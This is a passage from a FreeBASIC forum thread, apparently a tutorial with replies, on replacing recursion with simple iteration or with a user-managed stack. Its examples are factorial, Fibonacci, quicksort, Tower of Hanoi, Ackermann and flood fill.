execution time.\n\n1. Example with the simple \"factorial\" recursive function:\nNon-tail recursive form (already presented above):\n\nCode: Select all\n\n`Function recursiveFactorial (Byval n As Integer) As Integer  If (n = 0) Then                         '' end condition    Return 1  Else                                    '' recursion loop    Return n * recursiveFactorial(n - 1)  '' recursive call  End IfEnd Function`\nThis function has a non-tail recursive form because even though the recursive call is at the end of the function, this recursive call is not the last instruction of the function because one has to multiplied again by 'n' when 'recursiveFactorial(n - 1)' is got.\nThis calculation is done when popping context from execution stack.\n\nIt is quite easy to transform this function so that the recursion is a tail recursion.\nTo achieve this, it is necessary to add a new parameter to the function: the 'result' parameter which will serve as accumulator:\n\nCode: Select all\n\n`Function tailRecursiveFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  If (n = 0) Then                                     '' end condition    Return result  Else                                                '' recursion loop    Return tailRecursiveFactorial(n - 1, result * n)  '' tail recursive call  End IfEnd Function`\nThis time, the calculation is done when pushing context on execution stack.\n\nTail recursion is more explicit by calculating 'n - 1' and 'result * n' just before the recursive call:\n\nCode: Select all\n\n`Function explicitTailRecursiveFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  If (n = 0) Then                                     '' end condition    Return result  Else                                                '' recursion loop    result = result * n    n = n - 1    Return explicitTailRecursiveFactorial(n, result)  '' tail recursive call  End IfEnd Function`\n\nNow it is sufficient to resume execution at the beginning of the procedure by a 'Goto begin' instead of the function call, to obtain an iterative function:\n\nCode: Select all\n\n`Function translationToIterativeFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  begin:  If (n = 0) Then        '' end condition    Return result  Else                   '' iteration loop    result = result * n  '' iterative accumulation    n = n - 1    Goto begin           '' iterative jump  End IfEnd Function`\n\nFinally it is better to avoid the 'If ... Goto ... End If' instructions by using for example a 'While ... Wend' block instead, and the added 'result' parameter can be transformed into a local variable:\n\nCode: Select all\n\n`Function  betterTranslationToIterativeFactorial (Byval n As Integer) As Integer  Dim As Integer result = 1  While Not (n = 0)          '' end condition of iterative loop    result = result * n      '' iterative accumulation    n = n - 1  Wend  Return resultEnd Function`\n2. Similar transformation steps for the simple \"reverse string\" recursive function following:\n\nCode: Select all\n\n`Function recursiveReverse (Byval s As String) As String  If (s = \"\") Then                                   '' end condition    Return s  Else                                               '' recursion loop    Return recursiveReverse(Mid(s, 2)) & Left(s, 1)  '' recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function tailRecursiveReverse (Byval s As String, Byval cumul As String = \"\") As String  If (s = \"\") Then                                              '' end condition    Return cumul  Else                                                          '' recursion loop    Return tailRecursiveReverse(Mid(s, 2), Left(s, 1) & cumul)  '' tail recursive call  End IfEnd Function`\nNote: As the \"&\" operator (string concatenation) is not a symmetric operator ((a & b) <> (b & a), while (x * y) = (y * x) like previously), the two operand order must to be reversed when pushing context on execution stack instead of before when popping context from execution stack.\n\nCode: Select all\n\n`Function explicitTailRecursiveReverse (Byval s As String, Byval cumul As String = \"\") As String  If (s = \"\") Then                                 '' end condition    Return cumul  Else                                             '' recursion loop    cumul = Left(s, 1) & cumul    s = Mid(s, 2)    Return explicitTailRecursiveReverse(s, cumul)  '' tail recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function translationToIterativeReverse (Byval s As String, Byval cumul As String = \"\") As String  begin:  If (s = \"\") Then              '' end condition    Return cumul  Else                          '' iteration loop    cumul = Left(s, 1) & cumul  '' iterative accumulation    s = Mid(s, 2)    Goto begin                  '' iterative jump  End IfEnd Function`\n\nCode: Select all\n\n`Function betterTranslationToIterativeReverse (Byval s As String) As String  Dim As String cumul = \"\"  While Not (s = \"\")            '' end condition of iterative loop    cumul = Left(s, 1) & cumul  '' iterative accumulation    s = Mid(s, 2)  Wend  Return cumulEnd Function`\n3. As less simple example, the \"Fibonacci series\" non-tail recursive function:\nSometimes, the transformation to a tail recursive function is less obvious.\nThe code body of the recursive function is defined by using the recursive definition of the Fibonacci series:\nCase (n = 0) : F(0) = 0\nCase (n = 1) : F(1) = 1\nCase (n > 1) : F(n) = F(n-1) + F(n-2)\nThe first two lines allow to determine the end condition: 'If n = 0 Or n = 1 Then Return n'\nThe third line allows to determine the statement syntax which calls the function itself: 'Return F(n - 1) + F(n - 2)'\n\nNon-tail recursive form code:\n\nCode: Select all\n\n`Function recursiveFibonacci (Byval n As Uinteger) As Longint  If n = 0 Or n = 1 then                                          '' end condition    Return n  Else                                                            '' recursion loop    Return recursiveFibonacci(n - 1) + recursiveFibonacci(n - 2)  '' recursive call  End IfEnd Function`\n\nThe execution time duration for the highest values becomes no more negligible.\nIndeed, to compute F(n), there are 2^(n-1) calls: about one milliard for n=31.\n\nTry to make the recursive algorithm linear, using a recursive function which have 2 other parameters corresponding to the previous value and the last value of the series, let f(n, a, b).\nWe obtain:\nCase (n = 1): a = F(0) = 0, b = F(1) = 1\nCase (n-1): a = F(n-2), b = F(n-1)\nCase (n): F(n-1) = b, F(n) = F(n-1) + F(n-2) = a + b\n\nConsequently, for this new function f(n, a, b), the recursive call becomes f(n-1, b, a+b), and there are only (n-1) calls.\n\nTail recursive form code:\n\nCode: Select all\n\n`Function tailRecursiveFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  If n <= 1 Then                                    '' end condition    Return b * n  Else                                              '' recursion loop    Return tailRecursiveFibonacci(n - 1, b, a + b)  '' tail recursive call  End IfEnd Function`\n\nThen, similar transformations as previously in order to obtain the iterative form:\n\nCode: Select all\n\n`Function explicitTailRecursiveFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  If n <= 1 Then                                    '' end condition    Return b * n  Else                                              '' recursion loop    n = n - 1    Swap a, b    b = b + a    Return explicitTailRecursiveFibonacci(n, a, b)  '' tail recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function translationToIterativeFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  begin:  If n <= 1 Then  '' end condition    Return b * n  Else            '' iteration loopp    n = n - 1    Swap a, b    b = b + a    Goto begin    '' iterative jump  End IfEnd Function`\n\nCode: Select all\n\n`Function betterTranslationToIterativeFibonacci (Byval n As Uinteger) As Longint  Dim As Uinteger a = 0, b = 1  While Not (n <= 1)  '' end condition of iterative loop    n = n - 1    Swap a, b    b = b + a  Wend  Return b * nEnd Function`\n2.2) Replace Non-Tail Recursion with more Complex Iteration\nThe recursive procedure is a non-tail recursive procedure if there is at least one recursive call followed by at least one instruction.\nA non-tail recursion cannot be normally transformed into a simple iteration, or it could have been transformed already into tail recursion.\n\nTo avoid limitation due to the execution stack size, a non-tail recursive algorithm can always (more or less easily) be replaced by an iterative algorithm, by pushing the parameters that would normally be passed to the recursive procedure onto an own storage stack. In fact, the execution stack is replaced by a user stack (less limited in size).\n\nIn the following examples, the below user stack macro (compatible with any datatype) is used:\n\nCode: Select all\n\n`'' save as file: \"DynamicUserStackTypeCreateMacro.bi\"#macro DynamicUserStackTypeCreate(typename, datatype)  Type typename    Public:      Declare Constructor ()                       '' pre-allocating user stack memory      Declare Property push (Byref i As datatype)  '' pushing on the user stack      Declare Property pop () Byref As datatype    '' popping from the user stack      Declare Property used () As Integer          '' outputting number of used elements in the user stack      Declare Property allocated () As Integer     '' outputting number of allocated elements in the user stack      Declare Destructor ()                        '' deallocating user stack memory    Private:      Dim As datatype ae (Any)  '' array of elements      Dim As Integer nue        '' number of used elements      Dim As Integer nae        '' number of allocated elements      Dim As Integer nae0       '' minimum number of allocated elements  End Type  Constructor typename ()    This.nae0 = 2^Int(Log(1024 * 1024 / Sizeof(datatype)) / Log(2) + 1) '' only a power of 2 (1 MB < stack memory < 2 MB here)    This.nue = 0    This.nae = This.nae0    Redim This.ae(This.nae - 1)                                         '' pre-allocating user stack memory  End constructor  Property typename.push (Byref i As datatype)  '' pushing on the user stack    This.nue += 1    If This.nue > This.nae0 And This.nae < This.nue * 2 Then      This.nae *= 2      Redim Preserve This.ae(This.nae - 1)  '' allocating user stack memory for double used elements at least    End If    This.ae(This.nue - 1) = i  End Property  Property typename.pop () Byref As datatype  '' popping from the user stack    If This.nue > 0 Then      Property = This.ae(This.nue - 1)      This.nue -= 1      If This.nue > This.nae0 And This.nae > This.nue * 2 Then        This.nae \\= 2        Redim Preserve This.ae(This.nae - 1)  '' allocating user stack memory for double used elements at more      End If    Else      Static As datatype d      dim As datatype d0      d = d0      Property = d      Assertwarn(This.nue > 0)  '' warning if popping while empty user stack and debug mode (-g compiler option)    End If  End Property  Property typename.used () As Integer  '' outputting number of used elements in the user stack    Property = This.nue  End property  Property typename.allocated () As Integer  '' outputting number of allocated elements in the user stack    Property = This.nae  End property  Destructor typename  '' deallocating user stack memory    This.nue = 0    This.nae = 0    Erase This.ae  '' deallocating user stack memory  End destructor#endmacro`\n\n2.2.1) Translation Quite Simple from Final Recursive Procedure (non-tail) to Iterative Procedure\nA non-tail recursive procedure is final when the recursive call(s) is(are) placed at the end of executed code (no executable instruction line after and between for several recursive calls).\n\nIn the 3 following examples, the transformation of a recursive procedure into an iterative procedure is quite simple because the recursive calls are always at the end of executed code block, and without order constraints:\n- make the procedure parameters (and the return value for a function) as local ones,\n- push the initial parameter values in the user stack,\n- enter in a While ... Wend loop to empty the user stack:\n- pull the variables from the user stack,\n- process the variables similarly to the recursive procedure body,\n- accumulate the \"return\" variable for a recursive function (the final value will be returned at function body end),\n- replace the recursive calls by pushing the corresponding variables on the user stack,\n1. First example (for console window): Computation of the combination coefficients nCp (binomial coefficients calculation) and display of the Pascal's triangle:\nThe first function 'recursiveCombination' is the recursive form (not a tail recursion because there are two recursive calls with summation in the last active statement).\nThe second function 'translationToIterativeCombinationStack' is the iterative form using an own stack.\n\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- ahead, declaration of 1 local variable for the accumulator,\n- pushing the two initial parameters values in the user stack,\n- entering in the While ... Wend loop to empty the user stack,\n- pulling parameters from the user stack,\n- 'Return 1' is replaced by 'cumul = cumul + 1',\n- 'Return recursiveCombination(n - 1, p) + recursiveCombination(n - 1, p - 1)' is replaced by 'S.push = n - 1 : S.push = p' and 'S.push = n - 1 : S.push = p - 1'.\n\nCode: Select all\n\n`Function recursiveCombination (Byval n As Uinteger, Byval p As Uinteger) As Longint  If p = 0 Or p = n then    Return 1  Else    Return recursiveCombination(n - 1, p) + recursiveCombination(n - 1, p - 1)  End IfEnd Function'---------------------------------------------------------------------------#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForUinteger, Uinteger)Function translationToIterativeCombinationStack (Byval n As Uinteger, Byval p As Uinteger) As Longint  Dim cumul As Longint = 0  Dim As DynamicUserStackTypeForUinteger S  S.push = n : S.push = p  While S.used > 0    p = S.pop : n = S.pop    If p = 0 Or p = n then      cumul = cumul + 1    Else      S.push = n - 1 : S.push = p      S.push = n - 1 : S.push = p - 1    End If  Wend  Return cumulEnd Function'---------------------------------------------------------------------------Sub Display(Byval Combination As Function (Byval n As Uinteger, Byval p As Uinteger) As Longint, Byval n As Integer)  For I As Uinteger = 0 To n    For J As Uinteger = 0 To I      Locate , 6 * J + 3 * (n - I) + 3      Print Combination(I, J);    Next J    Print  Next IEnd Sub'---------------------------------------------------------------------------Print \" recursion:\";Display(@recursiveCombination, 12)PrintPrintPrint \" iteration with own storage stack:\";Display(@translationToIterativeCombinationStack, 12)Sleep`\n2. Second example (for graphics window), using a non-tail recursive subroutine (recursive drawing of circles):\nSimilar transformation steps:\n\nCode: Select all\n\n`Sub recursiveCircle (Byval x As Integer, Byval y As Integer, Byval r As Integer)  Circle (x, y), r  If r > 16 Then    recursiveCircle(x + r / 2, y, r / 2)    recursiveCircle(x - r / 2, y, r / 2)    recursiveCircle(x, y + r / 2, r / 2)    recursiveCircle(x, y - r / 2, r / 2)  End IfEnd Sub'---------------------------------------------------------------------------#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Sub recursiveToIterativeCircleStack (Byval x As Integer, Byval y As Integer, Byval r As Integer)  Dim As DynamicUserStackTypeForInteger S  S.push = x : S.push = y : S.push = r  Do While S.used > 0    r = S.pop : y = S.pop : x = S.pop    Circle (x, y), r    If r > 16 Then      S.push = x + r / 2 : S.push = y : S.push = r / 2      S.push = x - r / 2 : S.push = y : S.push = r / 2      S.push = x : S.push = y + r / 2 : S.push = r / 2      S.push = x : S.push = y - r / 2 : S.push = r / 2    End If  LoopEnd Sub'---------------------------------------------------------------------------Screen 12Locate 2, 2Print \"recursion:\"recursiveCircle(160, 160, 150)Locate 10, 47Print \"iteration with own storage stack:\"recursiveToIterativeCircleStack(480, 320, 150)Sleep`\n3. Third example (for console window), using a non-tail recursive subroutine (Quick Sort algorithm):\nSimilar transformation steps:\n\nCode: Select all\n\n`Dim shared As Ubyte t(99)Sub recursiveQuicksort (Byval L As Integer, Byval R As Integer)  Dim As Integer pivot = L, I = L, J = R  Do    If t(I) >= t(J) then      Swap t(I), t(J)      pivot = L + R - pivot    End If    If pivot = L then      J = J - 1    Else      I = I + 1    End If  Loop Until I = J  If L < I - 1 Then    recursiveQuicksort(L, I - 1)  End If  If R > J + 1 Then    recursiveQuicksort(J + 1, R)  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Sub translationToIteraticeQuicksortStack (Byval L As Integer, Byval R As Integer)  Dim As DynamicUserStackTypeForInteger S  S.push = L : S.push = R  While S.used > 0    R = S.pop : L = S.pop    Dim As Integer pivot = L, I = L, J = R    Do      If t(I) >= t(J) then        Swap t(I), t(J)        pivot = L + R - pivot      End If      If pivot = L then        J = J - 1      Else        I = I + 1      End If    Loop Until I = J    If L < I - 1 Then      S.push = L : S.push = I - 1    End If    If R > J + 1 Then      S.push = J + 1 : S.push = R    End If  WendEnd SubRandomizeFor I As Integer = Lbound(t) To Ubound(t)  t(i) = Int(Rnd * 256)Next IPrint \"raw memory:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintrecursiveQuicksort(Lbound(t), Ubound(t))Print \"sorted memory by recursion:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintPrintRandomizeFor I As Integer = Lbound(t) To Ubound(t)  t(i) = Int(Rnd * 256)Next IPrint \"raw memory:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrinttranslationToIteraticeQuicksortStack(Lbound(t), Ubound(t))Print \"sorted memory by iteration with stack:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintSleep`\n2.2.2) Translation Little More Complex from Non-Final Recursive Procedure to Iterative Procedure\nFor theses examples, the transformation of the non-final recursive procedure into an iterative procedure is a little more complex because the recursive call(s) is(are) not placed at the end of executed code (see the \"final\" definition at paragraph 2.2.1).\n\nThe general method used hereafter is to first transform original recursive procedure into a \"final\" recursive procedure where the recursive call(s) is(are) now placed at the end of executed code block (no executable instruction line between or after).\n\n1. First example (for console window), using a non-tail recursive subroutine (tower of Hanoi algorithm):\nFor this example, the two recursive calls are at the end of executed code block but separated by an instruction line and there is an order constraint.\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- the first step consists in removing the instruction line between the two recursive calls by adding its equivalent at top of the recursive code body (2 parameters are added to the procedure to pass the corresponding useful data),\n- then the process of translation to iterative form is similar to the previous examples (using a own storage stack) but reversing the order of the 2 recursive calls when pushing on the storage stack.\n\nCode: Select all\n\n`Sub recursiveHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String)  If n > 0 Then    recursiveHanoi(n - 1, departure, arrival, middle)    Print \"  move one disk from \" & departure & \" to \" & arrival    recursiveHanoi(n -1 , middle, departure, arrival)  End IfEnd SubSub finalRecursiveHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String, Byval dep As String = \"\", Byval arr As String = \"\")  If dep <> \"\" Then Print \"  move one disk from \" & dep & \" to \" & arr  If n > 0 Then    finalRecursiveHanoi(n - 1, departure, arrival, middle, \"\")    finalRecursiveHanoi(n - 1, middle, departure, arrival, departure, arrival)  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForString, String)Sub translationToIterativeHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String)  Dim As String dep = \"\", arr = \"\"  Dim As DynamicUserStackTypeForString S  S.push = Str(n) : S.push = departure : S.push = middle : S.push = arrival : S.push = dep : S.push = arr  While S.used > 0    arr = S.pop : dep = S.pop : arrival = S.pop : middle = S.pop : departure = S.pop : n = Val(S.pop)    If dep <> \"\" Then Print \"  move one disk from \" & dep & \" to \" & arr    If n > 0 Then      S.push = Str(n - 1) : S.push = middle : S.push = departure : S.push = arrival : S.push = departure : S.push = arrival      S.push = Str(n - 1) : S.push = departure : S.push = arrival : S.push = middle : S.push = \"\" : S.push = \"\"    End If  WendEnd SubPrint \"recursive tower of Hanoi:\"recursiveHanoi(3, \"A\", \"B\", \"C\")PrintPrint \"final recursive tower of Hanoi:\"finalRecursiveHanoi(3, \"A\", \"B\", \"C\")PrintPrint \"iterative tower of Hanoi:\"translationToIterativeHanoi(3, \"A\", \"B\", \"C\")PrintSleep`\n2. Second example (for console window), using a non-tail recursive subroutine (counting-down from n, then re-counting up to n):\nFor this example, the recursive call is followed by an instruction line before the end of executed code block.\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- the first step consists in replacing the instruction line at the end of executed code block by a new recursive call (a parameter is added to the procedure to pass the corresponding useful data),\n- an equivalent instruction line is added at top of the recursive code body (using the passed data), executed in this case instead of the normal code,\n- then the process of translation to iterative form is similar to the previous example (using a own storage stack) and reversing the order of the 2 recursive calls when pushing on the storage stack.\n\nCode: Select all\n\n`Sub recursiveCount (Byval n As Integer)  If n >= 0 Then    Print n & \" \";    If n = 0 Then Print    recursiveCount(n - 1)    Print n & \" \";  End IfEnd SubSub finalRecursiveCount (Byval n As Integer, Byval recount As String = \"\")  If recount <> \"\" Then    Print recount & \" \";  Else    If n >= 0 Then      Print n & \" \";      If n = 0 Then Print      finalRecursiveCount(n - 1, \"\")      finalRecursiveCount(n - 1, Str(n))    End If  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForString, String)Sub translationToIterativeCount (Byval n As Integer)  Dim As String recount = \"\"  Dim As DynamicUserStackTypeForString S  S.push = Str(n) : S.push = recount  While S.used > 0    recount = S.pop : n = Val(S.pop)  If recount <> \"\" Then    Print recount & \" \";  Else    If n >= 0 Then      Print n & \" \";      If n = 0 Then Print      S.push = Str(n - 1) : S.push = Str(n)      S.push = Str(n - 1) : S.push = \"\"    End If  End If  WendEnd SubPrint \"recursive counting-down then re-counting:\"recursiveCount(9)PrintPrintPrint \"final recursive counting-down then re-counting:\"finalRecursiveCount(9)PrintPrintPrint \"iterative counting-down then re-counting:\"translationToIterativeCount(9)PrintPrintSleep`\n2.2.3) Translation from Other Non-Obvious Recursive Procedure to Iterative Procedure\nTwo other cases of translation from recursion to iteration are presented here by means of simple examples:\n- for mutual recursion,\n- for nested recursion.\nTwo functions are said to be mutually recursive if the first calls the second, and in turn the second calls the first.\nA recursive function is said nested if an argument passed to the function refers to the function itself.\n\n1. Example using mutual recursive functions ('even()' and 'odd()' functions):\nFrom mutual recursive procedures to iterative stacking procedures (for the general case):\n- the first step consists in transforming the recursive procedures into \"final\" recursive procedures (see the \"final\" definition at paragraph 2.2.1),\n- then, the method is similar than that already described, with besides an additional parameter (an index) which is also pushed on the user stack in order to select the right code body to execute when pulling data from the stack,\n- therefore, each iterative procedure contains the translation (for stacking) of all code bodies from the recursive procedures.\nIn this following examples, the simple mutual recursive functions are here processed as in the general case (other very simple iterative solutions exist):\n\nCode: Select all\n\n`Declare Function recursiveIsEven(Byval n As Integer) As BooleanDeclare Function recursiveIsOdd(Byval n As Integer) As BooleanFunction recursiveIsEven(Byval n As Integer) As Boolean  If n = 0 Then    Return True  Else    Return recursiveIsOdd(n - 1)  End IfEnd FunctionFunction recursiveIsOdd(Byval n As Integer) As Boolean  If n = 0 Then    Return False  Else    Return recursiveIsEven(n - 1)  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeIsEven(Byval n As Integer) As Boolean  Dim As Integer i = 1  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionFunction iterativeIsOdd(Byval n As Integer) As Boolean  Dim As Integer i = 2  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionPrint recursiveIsEven(16), recursiveIsOdd(16)Print recursiveIsEven(17), recursiveIsOdd(17)PrintPrint iterativeIsEven(16), iterativeIsOdd(16)Print iterativeIsEven(17), iterativeIsOdd(17)PrintSleep`\n2. Example using nested recursive function ('Ackermann()' function):\nFrom nested recursive function to iterative stacking function:\n- use 2 independent storage stacks, one for the first parameter \"m\" and another for the second parameter \"n\" of the function, because of the nested call on one parameter,\n- 'Return expression' is transformed into a pushing the expression on the stack dedicated to the parameter where the nesting call is,\n- therefore a 'Return' of data popping from the same stack is added at code end.\n\nCode: Select all\n\n`Function recursiveAckermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return recursiveAckermann(m - 1, 1)    Else      Return recursiveAckermann(m - 1, recursiveAckermann(m, n - 1))    End If  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeAckermann (Byval m As Integer, Byval n As Integer) As Integer  Dim As DynamicUserStackTypeForInteger Sm, Sn  Sm.push = m : Sn.push = n  While Sm.used > 0    m = Sm.pop : n = Sn.pop    If m = 0 Then      Sn.push = n + 1                                    ' Return n + 1 (and because of nested call)    Else      If n = 0 Then        Sm.push = m - 1 : Sn.push = 1                    ' Return Ackermann(m - 1, 1)      Else        Sm.push = m - 1 : Sm.push = m : Sn.push = n - 1  ' Return Ackermann(m - 1, Ackermann(m, n - 1))      End If    End If  Wend  Return Sn.pop                                          ' (because of Sn.push = n + 1)End FunctionPrint recursiveAckermann(3, 0), recursiveAckermann(3, 1), recursiveAckermann(3, 2), recursiveAckermann(3, 3), recursiveAckermann(3, 4)Print iterativeAckermann(3, 0), iterativeAckermann(3, 1), iterativeAckermann(3, 2), iterativeAckermann(3, 3), iterativeAckermann(3, 4)Sleep`\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nPaint, using your DynamicUserStackTypeCreateMacro.bi (not optimised for speed).\nCode updated:\n\nCode: Select all\n\n`Const As Single PI = 2 * Atan2(1,0)Const As Ulong WHITE = &h00ffffffConst As Ulong RED = &h00dd0000Const As Ulong GREEN = &h0000aa00Const As Ulong BLUE = &h000000ddSub recursivePaint(x As Long, y As Long, fillColor As Long, borderColor As Long)   If Point(x, y) = fillColor Or Point(x, y) = borderColor Then      Exit Sub   Else      Pset(x, y), fillColor      'sleep 1,1 'enable for slow animation      recursivePaint(x + 1, y, fillColor, borderColor)      recursivePaint(x, y + 1, fillColor, borderColor)      recursivePaint(x - 1, y, fillColor, borderColor)      recursivePaint(x, y - 1, fillColor, borderColor)   End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForLong, Long)Sub recursiveToIterativePaint(x As Long, y As Long, fillColor As Long, borderColor As Long)   Dim As DynamicUserStackTypeForLong S   S.push = x : S.push = y   Do While S.used > 0      y = S.pop : x = S.pop 'pop in reverse      If Point(x, y) = fillColor Or Point(x, y) = borderColor Then         Continue Do      Else         Pset(x, y), fillColor 'add check         S.push = x + 1 : S.push = y         S.push = x : S.push = y + 1         S.push = x - 1 : S.push = y         S.push = x : S.push = y - 1      End If   LoopEnd SubScreenres 800,600,32'draw a flowerFor a As Single = 0 To PI*2 Step PI/6   Line(400 + Cos(a) * 280, 300 + Sin(a) * 280) - (400 + Cos(a-PI/8) * 150, 300 + Sin(a-PI/8) * 150), WHITE   Line(400 + Cos(a) * 280, 300 + Sin(a) * 280) - (400 + Cos(a+PI/8) * 150, 300 + Sin(a+PI/8) * 150), WHITE   Circle (400, 300), 140 - a * 20, WHITE, a, a + PI * 1.8NextWhile inkey\\$ = \"\"   Paint (400, 300), RED, WHITE   Sleep 200,1   recursivePaint(400, 300, BLUE, WHITE)   Sleep 200,1   recursiveToIterativePaint(400, 300, GREEN, WHITE)   Sleep 200,1Wend Print \"Done\"`\n\nUlong can be another integer. I was pushing and popping the colors also initially. This was not needed of course.\n\nI should try this on my Pentominoes solver or my Checkers / draughts computer\n\nNote: Some closing quotes (\") missing in your 'Hanoi towers'.\nLast edited by badidea on Sep 22, 2018 21:54, edited 2 times in total.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nbadidea wrote:Note: Some closing quotes (\") missing in your 'Hanoi towers'.\nThanks (corrected now).\n\nbadidea wrote:Paint, using your DynamicUserStackTypeCreateMacro.bi (not optimised for speed)\nIn your code, you do not have to define local variables 'xs' and 'ys' because the variables 'x' and 'y' are passed by value.\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nfxm wrote:In your code, you do not have to define local variables 'xs' and 'ys' because the variables 'x' and 'y' are passed by value.\nCode updated.\npaul doe\nPosts: 919\nJoined: Jul 25, 2017 17:22\nLocation: Argentina\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nReally nice and comprehensive work, fxm. Well done!\ndodicat\nPosts: 5913\nJoined: Jan 10, 2006 20:30\nLocation: Scotland\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThanks fxm\nPowerbasic had a recursive hanoi.\nHere is a translation.\n\nCode: Select all\n\n` '============================================================================='  This  program demostrates a recursive version of the popular \"Towers'  of Hanoi\" game.''  In order to run this program do the following:                           ³'    1. Load PowerBASIC by typing PB at the DOS prompt.'    2. Load the file HANOI.BAS from the Load option of the File'       pulldown menu.'    3. Compile and run the program by pressing F9.'=============================================================================Screen 9'\\$STACK 32766 ' allocate plenty of stack space since it's a recursive programDeclare Sub DisplayMoveConst X  = 1   ' named constants used for indexing and screen positioningConst Y  = 0Const PromptLine = 24   ' named constant indicating line for all user promptsConst MaxDisks   = 13   ' named constant indicating maximum number of disksConst CursorOff  = 0Dim Shared RecursionDepth As Integer' global variable declarationsDim Shared NumberOfDisks(1 To MaxDisks + 1) As Integer, SourceTower(1 To MaxDisks + 1)As IntegerDim Shared TargetTower(1 To MaxDisks + 1)As Integer, Disk(1 To MaxDisks + 1)As StringDim Shared DisksPosition(MaxDisks,1)As Integer, TowerHeight(1 To 3)As IntegerDim Shared As Integer NumberOfMoves = 0               ' used to keep track of number of moves madeDim Shared As Integer BottomLine    = 24              ' used to indicate bottom line of displayDim Shared As Integer TowerBase     = 2Sub Init   ' This procedure is used to initialize the screen and get the number    ' of disks to use.    Dim c As Integer    Color 7, 0                              ' initialize screen color    Cls    Color 4, 0    Locate 1, 26, CursorOff    Print \"TOWERS OF HANOI\"                 ' display the program banner    Color 6, 0    Locate PromptLine, X, CursorOff    Print \"Number of Disks (1 TO \" + Str(MaxDisks) +  \") \";    Do   ' get the number of disks from the user        Locate PromptLine, Len(\"Number of Disks (1 TO \" + Str(MaxDisks) +  \") \") + 1, CursorOff        Input NumberOfDisks(1)        If NumberOfDisks(1) > MaxDisks Then Beep    Loop Until NumberOfDisks(1) <= MaxDisks    TowerBase = TowerBase + NumberOfDisks(1)    Color 7, 0    Locate PromptLine, X, CursorOff    Print Space(79)                        ' clear prompt lineEnd Sub  ' end procedure InitSub DisplayGameScreen  ' This procedure displays a message on the screen    Locate 1, 26,CursorOff              ' position the cursor and turn it on    Color 4, 0                            ' set the display color    Print \"TOWERS OF HANOI FOR\"; NumberOfDisks(1); \"DISKS\"    Locate TowerBase + 1, X, CursorOff   ' position the cursor    Color 1, 0                              ' set the display color    Print String(80,176);                  ' display a bar on the screen    Color 7,0                               ' set the display colorEnd Sub  ' end procedure DisplayGameScreenSub MakeMoves(Byref  NumMoves As Integer)        RecursionDepth=RecursionDepth+1    ' check if we should exit routine    If NumberOfDisks(RecursionDepth) = 0 Then                RecursionDepth=RecursionDepth-1        Exit Sub    End If        NumberOfDisks(RecursionDepth + 1) = NumberOfDisks(RecursionDepth) - 1    SourceTower(RecursionDepth + 1) = SourceTower(RecursionDepth)    TargetTower(RecursionDepth + 1) = 6 - _    SourceTower(RecursionDepth) - TargetTower(RecursionDepth)    MakeMoves(NumMoves)    